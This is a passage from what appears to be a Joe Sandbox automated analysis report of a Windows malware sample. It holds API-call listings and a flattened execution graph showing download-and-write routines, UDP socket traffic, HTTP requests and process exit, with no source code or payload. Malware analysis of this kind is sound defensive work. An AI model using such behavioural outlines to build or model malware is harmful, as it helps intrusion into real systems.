                                                                      • Part of subcall function 0040D710: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                      • Part of subcall function 0040D710: bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                      • Part of subcall function 0040D710: lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                      • Part of subcall function 0040D710: sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                      • Part of subcall function 0040D710: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                    • String ID: TCP$UDP
                                                                    • API String ID: 1519345861-1097902612
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                    • CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleObjectSingleWait
                                                                    • String ID: .Mw
                                                                    • API String ID: 528846559-2453323595
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(00415E30,?,?,?), ref: 00405EBF
                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405EFE
                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F73
                                                                    • LeaveCriticalSection.KERNEL32(00415E30), ref: 00405F90
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSectionmemcpy$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 469056452-0

                                                                    Execution Graph

                                                                    Execution Coverage:21%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:1444
                                                                    Total number of Limit Nodes:26
402540 4592->4630 4594 4024ff __aligned_recalloc_base 4594->4541 4640 409e50 GetCurrentProcessId 4595->4640 4597 40a1bb 4598 40a1c2 4597->4598 4641 40a0f0 4597->4641 4598->4547 4601 40a1d7 RtlFreeHeap 4601->4598 4611 409e50 GetCurrentProcessId 4602->4611 4604 409dbb 4605 409dc7 __aligned_recalloc_base 4604->4605 4612 409e70 4604->4612 4607 409d9e 4605->4607 4608 409de2 RtlAllocateHeap 4605->4608 4607->4527 4607->4587 4608->4607 4609 409e09 __aligned_recalloc_base 4608->4609 4609->4607 4610 409e24 memset 4609->4610 4610->4607 4611->4604 4620 409e50 GetCurrentProcessId 4612->4620 4614 409e79 4615 409e96 HeapCreate 4614->4615 4621 409ee0 GetProcessHeaps 4614->4621 4616 409eb0 HeapSetInformation GetCurrentProcessId 4615->4616 4617 409ed7 4615->4617 4616->4617 4617->4605 4620->4614 4622 409e8c 4621->4622 4622->4615 4622->4617 4624 409db0 __aligned_recalloc_base 7 API calls 4623->4624 4625 40242b 4624->4625 4626 402820 4625->4626 4627 40282a 4626->4627 4628 409fa0 __aligned_recalloc_base 7 API calls 4627->4628 4629 402438 4628->4629 4629->4535 4631 40258e 4630->4631 4633 402551 4630->4633 4632 409fa0 __aligned_recalloc_base 7 API calls 4631->4632 4631->4633 4635 4025b2 _invalid_parameter 4632->4635 4633->4594 4634 4025e2 memcpy 4636 402606 _invalid_parameter 4634->4636 4635->4634 4637 40a1b0 __aligned_recalloc_base 3 API calls 4635->4637 4638 40a1b0 __aligned_recalloc_base 3 API calls 4636->4638 4639 4025df 4637->4639 4638->4633 4639->4634 4640->4597 4642 40a120 HeapValidate 4641->4642 4643 40a140 4641->4643 4642->4643 4643->4598 4643->4601 4661 40a220 4644->4661 4649 40a1b0 __aligned_recalloc_base 3 API calls 4650 40c861 4649->4650 4650->4428 4874 409fe0 4651->4874 4654 405d2a memcpy 4656 40a220 8 API calls 4654->4656 4655 405de8 4655->4428 4657 405d61 4656->4657 4884 40c190 4657->4884 4662 40a24d 4661->4662 4663 409fa0 __aligned_recalloc_base 7 API calls 4662->4663 4664 40a262 4662->4664 4665 40a264 memcpy 4662->4665 4663->4662 4664->4650 4666 40bd30 4664->4666 
4665->4662 4668 40bd3a 4666->4668 4670 40bd71 memcmp 4668->4670 4671 40bd98 4668->4671 4673 40a1b0 __aligned_recalloc_base 3 API calls 4668->4673 4674 40bd59 4668->4674 4675 40c220 4668->4675 4689 407af0 4668->4689 4670->4668 4672 40a1b0 __aligned_recalloc_base 3 API calls 4671->4672 4672->4674 4673->4668 4674->4649 4674->4650 4676 40c22f __aligned_recalloc_base 4675->4676 4677 409fa0 __aligned_recalloc_base 7 API calls 4676->4677 4679 40c239 4676->4679 4678 40c2c8 4677->4678 4678->4679 4680 402420 7 API calls 4678->4680 4679->4668 4681 40c2dd 4680->4681 4682 402420 7 API calls 4681->4682 4683 40c2e5 4682->4683 4685 40c33d __aligned_recalloc_base 4683->4685 4692 40c390 4683->4692 4697 402470 4685->4697 4688 402470 3 API calls 4688->4679 4805 409d10 4689->4805 4693 4024e0 10 API calls 4692->4693 4694 40c3a4 4693->4694 4703 4026f0 4694->4703 4696 40c3bc 4696->4683 4699 402484 _invalid_parameter 4697->4699 4700 4024ce 4697->4700 4698 40a1b0 __aligned_recalloc_base 3 API calls 4698->4700 4701 40a1b0 __aligned_recalloc_base 3 API calls 4699->4701 4702 4024ac 4699->4702 4700->4688 4701->4702 4702->4698 4706 402710 4703->4706 4705 40270a 4705->4696 4707 402724 4706->4707 4708 402540 __aligned_recalloc_base 10 API calls 4707->4708 4709 40276d 4708->4709 4710 402540 __aligned_recalloc_base 10 API calls 4709->4710 4711 40277d 4710->4711 4712 402540 __aligned_recalloc_base 10 API calls 4711->4712 4713 40278d 4712->4713 4714 402540 __aligned_recalloc_base 10 API calls 4713->4714 4715 40279d 4714->4715 4716 4027a6 4715->4716 4717 4027cf 4715->4717 4721 403e20 4716->4721 4738 403df0 4717->4738 4720 4027c7 __aligned_recalloc_base 4720->4705 4722 402820 _invalid_parameter 7 API calls 4721->4722 4723 403e37 4722->4723 4724 402820 _invalid_parameter 7 API calls 4723->4724 4725 403e46 4724->4725 4726 402820 _invalid_parameter 7 API calls 4725->4726 4727 403e55 4726->4727 4728 402820 _invalid_parameter 7 API calls 4727->4728 4729 403e64 _invalid_parameter __aligned_recalloc_base 
4728->4729 4731 40400f _invalid_parameter 4729->4731 4741 402850 4729->4741 4732 402850 _invalid_parameter 3 API calls 4731->4732 4733 404035 _invalid_parameter 4731->4733 4732->4731 4734 402850 _invalid_parameter 3 API calls 4733->4734 4735 40405b _invalid_parameter 4733->4735 4734->4733 4736 402850 _invalid_parameter 3 API calls 4735->4736 4737 404081 4735->4737 4736->4735 4737->4720 4745 404090 4738->4745 4740 403e0c 4740->4720 4742 402866 4741->4742 4743 40285b 4741->4743 4742->4729 4744 40a1b0 __aligned_recalloc_base 3 API calls 4743->4744 4744->4742 4746 4040a6 _invalid_parameter 4745->4746 4747 4040b8 _invalid_parameter 4746->4747 4748 4040dd 4746->4748 4750 404103 4746->4750 4747->4740 4775 403ca0 4748->4775 4751 40413d 4750->4751 4752 40415e 4750->4752 4785 404680 4751->4785 4754 402820 _invalid_parameter 7 API calls 4752->4754 4755 40416f 4754->4755 4756 402820 _invalid_parameter 7 API calls 4755->4756 4757 40417e 4756->4757 4758 402820 _invalid_parameter 7 API calls 4757->4758 4759 40418d 4758->4759 4760 402820 _invalid_parameter 7 API calls 4759->4760 4761 40419c 4760->4761 4798 403d70 4761->4798 4763 402820 _invalid_parameter 7 API calls 4764 4041ca _invalid_parameter 4763->4764 4764->4763 4766 404284 _invalid_parameter __aligned_recalloc_base 4764->4766 4765 402850 _invalid_parameter 3 API calls 4765->4766 4766->4765 4767 4045a3 _invalid_parameter 4766->4767 4768 402850 _invalid_parameter 3 API calls 4767->4768 4769 4045c9 _invalid_parameter 4767->4769 4768->4767 4770 402850 _invalid_parameter 3 API calls 4769->4770 4771 4045ef _invalid_parameter 4769->4771 4770->4769 4772 402850 _invalid_parameter 3 API calls 4771->4772 4773 404615 _invalid_parameter 4771->4773 4772->4771 4773->4747 4774 402850 _invalid_parameter 3 API calls 4773->4774 4774->4773 4776 403cae 4775->4776 4777 402820 _invalid_parameter 7 API calls 4776->4777 4778 403ccb 4777->4778 4779 402820 _invalid_parameter 7 API calls 4778->4779 4780 403cda _invalid_parameter 4779->4780 4781 402850 
_invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4780->4781 4782 403d3a _invalid_parameter 4780->4782 4781->4780 4783 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4782->4783 4784 403d60 4782->4784 4783->4782 4784->4747 4786 402820 _invalid_parameter 7 API calls 4785->4786 4787 404697 4786->4787 4788 402820 _invalid_parameter 7 API calls 4787->4788 4789 4046a6 4788->4789 4790 402820 _invalid_parameter 7 API calls 4789->4790 4791 4046b5 _invalid_parameter __aligned_recalloc_base 4790->4791 4792 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4791->4792 4794 404841 _invalid_parameter 4791->4794 4792->4791 4793 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4793->4794 4794->4793 4795 404867 _invalid_parameter 4794->4795 4796 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4795->4796 4797 40488d 4795->4797 4796->4795 4797->4747 4799 402820 _invalid_parameter 7 API calls 4798->4799 4800 403d7f _invalid_parameter 4799->4800 4801 403ca0 _invalid_parameter 9 API calls 4800->4801 4802 403db8 _invalid_parameter 4801->4802 4803 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4802->4803 4804 403de3 4802->4804 4803->4802 4804->4764 4806 409d22 4805->4806 4809 409c70 4806->4809 4810 409fa0 __aligned_recalloc_base 7 API calls 4809->4810 4811 409c80 4810->4811 4813 409cbc 4811->4813 4816 407b0f 4811->4816 4818 4091a0 4811->4818 4825 409790 4811->4825 4830 409b60 4811->4830 4815 40a1b0 __aligned_recalloc_base 3 API calls 4813->4815 4815->4816 4816->4668 4819 4091a9 4818->4819 4820 4091b3 4818->4820 4819->4811 4820->4819 4821 4091f6 memset 4820->4821 4821->4819 4822 409217 4821->4822 4822->4819 4823 40921d memcpy 4822->4823 4838 408f70 4823->4838 4826 40979d 4825->4826 4827 4097a7 4825->4827 4826->4811 4827->4826 4828 40989f memcpy 4827->4828 4843 4094c0 4827->4843 4828->4827 4831 409b6c 4830->4831 4833 409b76 4830->4833 4831->4811 4832 4094c0 64 API 
calls 4834 409bf7 4832->4834 4833->4831 4833->4832 4834->4831 4835 408f70 6 API calls 4834->4835 4836 409c16 4835->4836 4836->4831 4837 409c2b memcpy 4836->4837 4837->4831 4839 408fbe 4838->4839 4840 408f7e 4838->4840 4839->4819 4840->4839 4842 408eb0 6 API calls 4840->4842 4842->4840 4844 4094da 4843->4844 4847 4094d0 4843->4847 4844->4847 4853 409300 4844->4853 4847->4827 4848 409618 memcpy 4848->4847 4850 409637 memcpy 4851 409761 4850->4851 4852 4094c0 62 API calls 4851->4852 4852->4847 4854 40930d 4853->4854 4855 409317 4853->4855 4854->4847 4854->4848 4854->4850 4855->4854 4856 4093a0 4855->4856 4857 4093a5 4855->4857 4858 409388 4855->4858 4864 408c60 4856->4864 4861 408f70 6 API calls 4857->4861 4860 408f70 6 API calls 4858->4860 4860->4856 4861->4856 4863 40944c memset 4863->4854 4865 408c79 4864->4865 4873 408c6f 4864->4873 4866 408b30 9 API calls 4865->4866 4865->4873 4867 408d72 4866->4867 4868 409fa0 __aligned_recalloc_base 7 API calls 4867->4868 4869 408dc1 4868->4869 4870 4089a0 46 API calls 4869->4870 4869->4873 4871 408dee 4870->4871 4872 40a1b0 __aligned_recalloc_base GetCurrentProcessId HeapValidate RtlFreeHeap 4871->4872 4872->4873 4873->4854 4873->4863 4893 409e50 GetCurrentProcessId 4874->4893 4876 409feb 4877 409e70 __aligned_recalloc_base 5 API calls 4876->4877 4878 409ff7 __aligned_recalloc_base 4876->4878 4877->4878 4879 40a0f0 __aligned_recalloc_base HeapValidate 4878->4879 4880 40a0a0 HeapAlloc 4878->4880 4881 40a06a HeapReAlloc 4878->4881 4882 40a1b0 __aligned_recalloc_base 3 API calls 4878->4882 4883 405d15 4878->4883 4879->4878 4880->4878 4881->4878 4882->4878 4883->4654 4883->4655 4887 40c19b 4884->4887 4885 409fa0 __aligned_recalloc_base 7 API calls 4885->4887 4886 405dad 4886->4655 4888 407310 4886->4888 4887->4885 4887->4886 4889 409fa0 __aligned_recalloc_base 7 API calls 4888->4889 4890 407320 4889->4890 4891 407367 4890->4891 4892 40732c memcpy CreateThread 4890->4892 4891->4655 4892->4891 4894 407370 GetTickCount srand rand 
Sleep 4892->4894 4893->4876 4895 4073a7 4894->4895 4896 4073fd 4894->4896 4897 4073fb 4895->4897 4900 4073b6 StrChrA 4895->4900 4896->4897 4898 40eae0 56 API calls 4896->4898 4899 40a1b0 __aligned_recalloc_base 3 API calls 4897->4899 4898->4897 4901 407428 4899->4901 4902 4073cb 4900->4902 4905 40eae0 9 API calls 4902->4905 4906 40ed03 InternetCloseHandle Sleep 4905->4906 4907 40eba3 InternetOpenUrlW 4905->4907 4908 4073e5 Sleep 4906->4908 4909 40ed2a 6 API calls 4906->4909 4910 40ebd2 CreateFileW 4907->4910 4911 40ecf6 InternetCloseHandle 4907->4911 4908->4895 4909->4908 4912 40eda6 wsprintfW DeleteFileW 4909->4912 4913 40ec01 InternetReadFile 4910->4913 4914 40ecd3 4910->4914 4911->4906 4915 40e7c0 18 API calls 4912->4915 4916 40ec54 wsprintfW DeleteFileW 4913->4916 4917 40ec25 4913->4917 4914->4911 4919 40eddb 4915->4919 4933 40e7c0 CreateFileW 4916->4933 4917->4916 4918 40ec2e WriteFile 4917->4918 4918->4913 4921 40ede5 Sleep 4919->4921 4922 40ee19 DeleteFileW 4919->4922 4924 40e980 6 API calls 4921->4924 4922->4908 4926 40edfc 4924->4926 4926->4908 4930 40ee0f ExitProcess 4926->4930 4927 40eca0 Sleep 4929 40e980 6 API calls 4927->4929 4928 40ecdc DeleteFileW 4928->4914 4931 40ecb7 4929->4931 4931->4914 4932 40eccb ExitProcess 4931->4932 4934 40e805 CreateFileMappingW 4933->4934 4938 40e906 4933->4938 4935 40e826 MapViewOfFile 4934->4935 4934->4938 4937 40e845 GetFileSize 4935->4937 4935->4938 4936 40e920 CreateFileW 4939 40e942 WriteFile 4936->4939 4940 40e968 4936->4940 4942 40e861 4937->4942 4943 40e8fc UnmapViewOfFile 4937->4943 4938->4936 4944 40e971 4938->4944 4939->4940 4941 40a1b0 __aligned_recalloc_base 3 API calls 4940->4941 4941->4944 4953 40c7f0 4942->4953 4943->4938 4944->4927 4944->4928 4947 40c190 7 API calls 4948 40e8b0 4947->4948 4948->4943 4949 40e8cd memcmp 4948->4949 4949->4943 4950 40e8e9 4949->4950 4951 40a1b0 __aligned_recalloc_base 3 API calls 4950->4951 4952 40e8f2 4951->4952 4952->4943 4954 40c220 10 API calls 4953->4954 4955 40c814 
4954->4955 4955->4943 4955->4947 4957 40d73d htons inet_addr setsockopt 4956->4957 4962 40d86e 4956->4962 4958 40aa80 8 API calls 4957->4958 4959 40d7b6 bind lstrlenA sendto ioctlsocket 4958->4959 4965 40d80b 4959->4965 4962->4436 4963 40d832 5013 40ab40 shutdown closesocket 4963->5013 4964 409fe0 9 API calls 4964->4965 4965->4963 4965->4964 5004 40d890 4965->5004 5020 40dbc0 memset InternetCrackUrlA InternetOpenA 4966->5020 4969 40da9e 4969->4436 4971 40a1b0 __aligned_recalloc_base 3 API calls 4971->4969 4975 40da6b 4975->4971 4977 40da61 SysFreeString 4977->4975 5127 40aa40 inet_addr 4981->5127 4984 40aadc connect 4985 40aaf0 getsockname 4984->4985 4986 40ab24 4984->4986 4985->4986 5130 40ab40 shutdown closesocket 4986->5130 4988 40ab2d 4989 40e470 4988->4989 5131 40aa20 inet_ntoa 4989->5131 4991 40e486 4992 40c9f0 11 API calls 4991->4992 4993 40e4a5 4992->4993 4994 40d6cc 4993->4994 5132 40e4f0 memset InternetCrackUrlA InternetOpenA 4993->5132 4994->4441 4997 40e4dc 4999 40a1b0 __aligned_recalloc_base 3 API calls 4997->4999 4998 40a1b0 __aligned_recalloc_base 3 API calls 4998->4997 4999->4994 5003 40a2d4 5000->5003 5001 40a2da 5001->4431 5002 40a1b0 GetCurrentProcessId HeapValidate RtlFreeHeap __aligned_recalloc_base 5002->5003 5003->5001 5003->5002 5009 40d8ac 5004->5009 5005 40d974 5005->4965 5006 40d8c8 recvfrom 5007 40d8f6 StrCmpNIA 5006->5007 5008 40d8e9 Sleep 5006->5008 5007->5009 5010 40d915 StrStrIA 5007->5010 5008->5009 5009->5005 5009->5006 5010->5009 5011 40d936 StrChrA 5010->5011 5014 40c8a0 5011->5014 5013->4962 5018 40c8ab 5014->5018 5015 40c8b1 lstrlenA 5017 40c8c4 5015->5017 5015->5018 5016 409fa0 __aligned_recalloc_base 7 API calls 5016->5018 5017->5009 5018->5015 5018->5016 5018->5017 5019 40c8e0 memcpy 5018->5019 5019->5017 5019->5018 5021 40dc61 InternetConnectA 5020->5021 5022 40d99a 5020->5022 5023 40ddca InternetCloseHandle 5021->5023 5024 40dc9a HttpOpenRequestA 5021->5024 5022->4969 5033 40dab0 5022->5033 5023->5022 5025 40dcd0 
HttpSendRequestA 5024->5025 5026 40ddbd InternetCloseHandle 5024->5026 5027 40ddb0 InternetCloseHandle 5025->5027 5029 40dced 5025->5029 5026->5023 5027->5026 5028 40dd0e InternetReadFile 5028->5029 5030 40dd3b 5028->5030 5029->5028 5029->5030 5031 409fe0 9 API calls 5029->5031 5030->5027 5032 40dd56 memcpy 5031->5032 5032->5029 5062 405690 5033->5062 5036 40d9b3 5036->4975 5043 40e420 5036->5043 5037 40dada SysAllocString 5038 40daf1 CoCreateInstance 5037->5038 5039 40dba7 5037->5039 5040 40db9d SysFreeString 5038->5040 5042 40db16 5038->5042 5041 40a1b0 __aligned_recalloc_base 3 API calls 5039->5041 5040->5039 5041->5036 5042->5040 5079 40df70 5043->5079 5046 40ddf0 5084 40e240 5046->5084 5051 40e3a0 6 API calls 5052 40de47 5051->5052 5058 40da32 5052->5058 5101 40e060 5052->5101 5055 40de7f 5055->5058 5106 40df10 5055->5106 5056 40e060 6 API calls 5056->5055 5058->4977 5059 40c9f0 5058->5059 5122 40c960 5059->5122 5067 40569d 5062->5067 5063 4056a3 lstrlenA 5063->5067 5068 4056b6 5063->5068 5065 409fa0 __aligned_recalloc_base 7 API calls 5065->5067 5067->5063 5067->5065 5067->5068 5069 40a1b0 __aligned_recalloc_base 3 API calls 5067->5069 5070 405630 5067->5070 5074 4055e0 5067->5074 5068->5036 5068->5037 5069->5067 5071 405647 MultiByteToWideChar 5070->5071 5072 40563a lstrlenA 5070->5072 5073 40566c 5071->5073 5072->5071 5073->5067 5075 4055eb 5074->5075 5076 4055f1 lstrlenA 5075->5076 5077 405630 2 API calls 5075->5077 5078 405627 5075->5078 5076->5075 5077->5075 5078->5067 5082 40df96 5079->5082 5080 40da1d 5080->4975 5080->5046 5081 40e013 lstrcmpiW 5081->5082 5083 40e02b SysFreeString 5081->5083 5082->5080 5082->5081 5082->5083 5083->5082 5086 40e266 5084->5086 5085 40de0b 5085->5058 5096 40e3a0 5085->5096 5086->5085 5087 40e2f3 lstrcmpiW 5086->5087 5088 40e373 SysFreeString 5087->5088 5089 40e306 5087->5089 5088->5085 5090 40df10 2 API calls 5089->5090 5092 40e314 5090->5092 5091 40e365 5091->5088 5092->5088 5092->5091 5093 40e343 lstrcmpiW 5092->5093 
5094 40e355 5093->5094 5095 40e35b SysFreeString 5093->5095 5094->5095 5095->5091 5097 40df10 2 API calls 5096->5097 5098 40e3bb 5097->5098 5099 40e240 6 API calls 5098->5099 5100 40de29 5098->5100 5099->5100 5100->5051 5100->5058 5102 40df10 2 API calls 5101->5102 5104 40e07b 5102->5104 5103 40de65 5103->5055 5103->5056 5104->5103 5110 40e0e0 5104->5110 5107 40df36 5106->5107 5108 40df70 2 API calls 5107->5108 5109 40df4d 5107->5109 5108->5109 5109->5058 5112 40e106 5110->5112 5111 40e21d 5111->5103 5112->5111 5113 40e193 lstrcmpiW 5112->5113 5114 40e213 SysFreeString 5113->5114 5115 40e1a6 5113->5115 5114->5111 5116 40df10 2 API calls 5115->5116 5118 40e1b4 5116->5118 5117 40e205 5117->5114 5118->5114 5118->5117 5119 40e1e3 lstrcmpiW 5118->5119 5120 40e1f5 5119->5120 5121 40e1fb SysFreeString 5119->5121 5120->5121 5121->5117 5123 40c96d 5122->5123 5124 409fe0 9 API calls 5123->5124 5125 40c910 _vscprintf wvsprintfA 5123->5125 5126 40c988 SysFreeString 5123->5126 5124->5123 5125->5123 5126->4977 5128 40aa6c socket 5127->5128 5129 40aa59 gethostbyname 5127->5129 5128->4984 5128->4988 5129->5128 5130->4988 5131->4991 5133 40e4c7 5132->5133 5134 40e594 InternetConnectA 5132->5134 5133->4997 5133->4998 5135 40e714 InternetCloseHandle 5134->5135 5136 40e5cd HttpOpenRequestA 5134->5136 5135->5133 5137 40e603 HttpAddRequestHeadersA HttpSendRequestA 5136->5137 5138 40e707 InternetCloseHandle 5136->5138 5139 40e6fa InternetCloseHandle 5137->5139 5142 40e64d 5137->5142 5138->5135 5139->5138 5140 40e664 InternetReadFile 5141 40e691 5140->5141 5140->5142 5141->5139 5142->5140 5142->5141 5143 409fe0 9 API calls 5142->5143 5144 40e6ac memcpy 5143->5144 5144->5142 5151 407067 5145->5151 5146 4072c0 CoCreateInstance 5146->5151 5147 40723b 5149 407244 SysFreeString 5147->5149 5150 40700b SysFreeString 5147->5150 5148 40a1b0 __aligned_recalloc_base 3 API calls 5148->5147 5149->5150 5150->4444 5151->5146 5152 4071b6 SysAllocString 5151->5152 5153 407082 5151->5153 5152->5151 
5152->5153 5153->5147 5153->5148 5155 40beca 5154->5155 5156 40bece 5154->5156 5155->4450 5158 40be80 CryptAcquireContextW 5156->5158 5159 40bebb 5158->5159 5160 40be9d CryptGenRandom CryptReleaseContext 5158->5160 5159->5155 5160->5159 5161->4463 5213 40add0 gethostname 5162->5213 5165 40aeb9 5165->4463 5167 40aecc strcmp 5167->5165 5168 40aee1 5167->5168 5217 40aa20 inet_ntoa 5168->5217 5170 40aeef strstr 5171 40af40 5170->5171 5172 40aeff 5170->5172 5218 40aa20 inet_ntoa 5171->5218 5230 40aa20 inet_ntoa 5172->5230 5175 40af0d strstr 5175->5165 5177 40af1d 5175->5177 5176 40af4e strstr 5178 40af5e 5176->5178 5179 40af9f 5176->5179 5231 40aa20 inet_ntoa 5177->5231 5232 40aa20 inet_ntoa 5178->5232 5219 40aa20 inet_ntoa 5179->5219 5183 40af6c strstr 5183->5165 5186 40af7c 5183->5186 5184 40afad strstr 5187 40afbd 5184->5187 5188 40affe EnterCriticalSection 5184->5188 5185 40af2b strstr 5185->5165 5185->5171 5233 40aa20 inet_ntoa 5186->5233 5234 40aa20 inet_ntoa 5187->5234 5189 40b016 5188->5189 5198 40b041 5189->5198 5236 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5189->5236 5192 40af8a strstr 5192->5165 5192->5179 5193 40afcb strstr 5193->5165 5194 40afdb 5193->5194 5235 40aa20 inet_ntoa 5194->5235 5197 40b13a LeaveCriticalSection 5197->5165 5198->5197 5200 409d90 7 API calls 5198->5200 5199 40afe9 strstr 5199->5165 5199->5188 5201 40b085 5200->5201 5201->5197 5220 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5201->5220 5203 40b0a3 5204 40b0d0 5203->5204 5205 40b0c6 Sleep 5203->5205 5207 40b0f5 5203->5207 5206 40a1b0 __aligned_recalloc_base 3 API calls 5204->5206 5205->5203 5206->5207 5207->5197 5221 40ab80 5207->5221 5210 40ab80 13 API calls 5209->5210 5211 40ab73 LeaveCriticalSection 5210->5211 5211->4471 5212->4476 5214 40adf7 gethostbyname 5213->5214 5215 40ae13 5213->5215 5214->5215 5215->5165 5216 40aa20 inet_ntoa 5215->5216 5216->5167 5217->5170 5218->5176 5219->5184 5220->5203 5222 40ab94 5221->5222 5229 40ab8f 5221->5229 5223 409fa0 
__aligned_recalloc_base 7 API calls 5222->5223 5225 40aba8 5223->5225 5224 40ac04 CreateFileW 5226 40ac53 InterlockedExchange 5224->5226 5227 40ac27 WriteFile FlushFileBuffers 5224->5227 5225->5224 5225->5229 5228 40a1b0 __aligned_recalloc_base 3 API calls 5226->5228 5227->5226 5228->5229 5229->5197 5230->5175 5231->5185 5232->5183 5233->5192 5234->5193 5235->5199 5236->5198 5240 40d25d 5237->5240 5238 40d193 5238->4483 5238->4484 5239 40d281 WaitForSingleObject 5239->5240 5240->5238 5240->5239 5306 4013b0 5241->5306 5243 40d55d 5245 40d577 InterlockedExchangeAdd 5243->5245 5246 40d5bb WaitForSingleObject 5243->5246 5250 40d5dd 5243->5250 5318 40b200 EnterCriticalSection 5243->5318 5323 40b520 5243->5323 5245->5243 5245->5246 5246->5243 5247 40d5d4 5246->5247 5326 401330 5247->5326 5252 401f92 5251->5252 5253 402008 5251->5253 5254 401f97 WSAGetOverlappedResult 5252->5254 5405 401d60 5252->5405 5254->5252 5255 401fb9 WSAGetLastError 5254->5255 5255->5252 5257 401fd3 GetQueuedCompletionStatus 5257->5252 5257->5253 5446 401470 5258->5446 5260 40d604 5261 40d62f 5260->5261 5262 40d615 WaitForSingleObject 5260->5262 5263 401330 7 API calls 5262->5263 5263->5261 5460 4021b0 5264->5460 5267 40cf42 5268 40cf25 WaitForSingleObject 5464 401600 5268->5464 5272 40b423 WaitForSingleObject 5271->5272 5273 40b451 5272->5273 5274 40b43b InterlockedDecrement 5272->5274 5275 40b44a 5274->5275 5275->5272 5276 40ab60 15 API calls 5275->5276 5276->5275 5278 401ac9 5277->5278 5279 40194d WSAWaitForMultipleEvents 5277->5279 5280 4019f0 GetTickCount 5279->5280 5281 40196a WSAEnumNetworkEvents 5279->5281 5282 401a43 GetTickCount 5280->5282 5283 401a05 EnterCriticalSection 5280->5283 5281->5280 5297 401983 5281->5297 5284 401ab5 WaitForSingleObject 5282->5284 5285 401a4e EnterCriticalSection 5282->5285 5286 401a3a LeaveCriticalSection 5283->5286 5290 401a16 5283->5290 5284->5278 5284->5279 5288 401aa1 LeaveCriticalSection GetTickCount 5285->5288 5289 401a5f InterlockedExchangeAdd 
5285->5289 5286->5284 5287 401992 accept 5287->5280 5287->5297 5288->5284 5546 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5289->5546 5293 401a29 LeaveCriticalSection 5290->5293 5528 401820 5290->5528 5293->5284 5295 401a72 5295->5288 5295->5289 5547 40ab40 shutdown closesocket 5295->5547 5297->5280 5297->5287 5298 4019e9 5297->5298 5508 4022c0 5297->5508 5299 401cf0 7 API calls 5298->5299 5299->5280 5303 40ceb4 5300->5303 5301 40b200 5 API calls 5301->5303 5302 40ced0 WaitForSingleObject 5302->5303 5305 40cef5 5302->5305 5303->5301 5303->5302 5303->5305 5561 40cad0 InterlockedExchangeAdd 5303->5561 5307 409d90 7 API calls 5306->5307 5308 4013bb CreateEventA socket 5307->5308 5309 4013f2 5308->5309 5315 4013f8 5308->5315 5312 401330 7 API calls 5309->5312 5310 401401 bind 5313 401444 CreateThread 5310->5313 5314 401434 5310->5314 5311 401462 5311->5243 5312->5315 5313->5311 5336 401100 5313->5336 5316 401330 7 API calls 5314->5316 5315->5310 5315->5311 5317 40143a 5316->5317 5317->5243 5319 40b237 LeaveCriticalSection 5318->5319 5320 40b21f 5318->5320 5319->5243 5321 40bec0 3 API calls 5320->5321 5322 40b22a 5321->5322 5322->5319 5365 40b480 5323->5365 5327 401339 5326->5327 5333 40139b 5326->5333 5328 401341 SetEvent WaitForSingleObject 5327->5328 5327->5333 5329 401362 5328->5329 5334 40a1b0 